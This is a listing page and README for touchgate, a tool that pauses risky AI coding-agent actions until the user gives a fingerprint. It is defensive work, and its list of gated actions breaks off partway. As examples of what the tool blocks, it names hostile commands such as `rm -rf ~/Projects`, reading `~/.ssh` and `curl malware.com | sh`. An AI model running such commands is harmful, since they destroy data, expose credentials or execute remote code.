iamanuclearwarhead

Touchgate — AI skill for Claude Code

AI community

fingerprint approval for risky ai agent actions in claude code, codex and gemini cli.

How to install Touchgate

This entry records only its repository, not the path inside it, so there is no exact command to give. Open iamanuclearwarhead/touchgate and copy the folder into ~/.claude/skills/, or the file into ~/.claude/agents/.

What Touchgate does

fingerprint approval for risky ai agent actions in claude code, codex and gemini cli.

Alternatives in AI

  • System Prompts Leaks — Extracted system prompts from ChatGPT (GPT-5.4, GPT-5.3, Codex), Claude (Opus 4.6, Sonnet 4.6, Claude Code), G 38.6k ★
  • AIHawk — Open-source AI browser agent: describe any task in plain language and it autonomously browses, clicks, types a 30.3k ★
  • CLI 代理 API — English 中文 一个为 CLI 提供 OpenAI/Gemini/Claude/Codex 兼容 API 接口的代理服务器 19k ★

README

touchgate

fingerprint approval for risky ai agent actions

if your agent wants to `rm -rf ~/Projects`, force push something, read `~/.ssh` or run `curl malware.com | sh`. touchgate pauses it and asks for your fingerprint first. touch the sensor and it goes through, do nothing and it gets blockedd.

works with claude code, codex and gemini cli. uses fprintd on linux, touch id on macos and windows hello on windows

why

agents run with your permissions. `--dangerously-skip-permissions` and auto modes are great until the one command you didnt go over. if theres a prompt injection inside a file and your agent feels like executing it, ittl be blocked

touchgate puts its hook and its rules in your agents' **managed** config, the admin level files that user and project settings cant override, and those files are owned by root.

install

arch

yay -S touchgate-git
# or
paru -S touchgate-git

then

sudo touchgate install
touchgate doctor

from source

cargo install --git https://github.com/iamanuclearwarhead/touchgate
sudo touchgate install
touchgate doctor

on windows run `touchgate install` from an admin terminal (pure slop btw)

you need a fingerprint reader with at least one finger enrolled.

usage

touchgate install             gate every supported agent (sudo)
touchgate install --lock      also block hooks added outside managed config
touchgate doctor              check the reader, the install and known bypasses
touchgate test rm -rf build   what would happen with this command
touchgate test --read .env    or with a file, --write, --fetch, --mcp
touchgate test --verify ...   same but actually ask for the fingerprint
touchgate log                 recent touches and denials
touchgate uninstall           take the hooks back out (sudo)

what needs a touch

out of the box:

  • deleting stuff, rm -r, rm -f, find -delete, shred
  • sudo, doas, pkexec and friends
  • git history rewrites, force push, `rese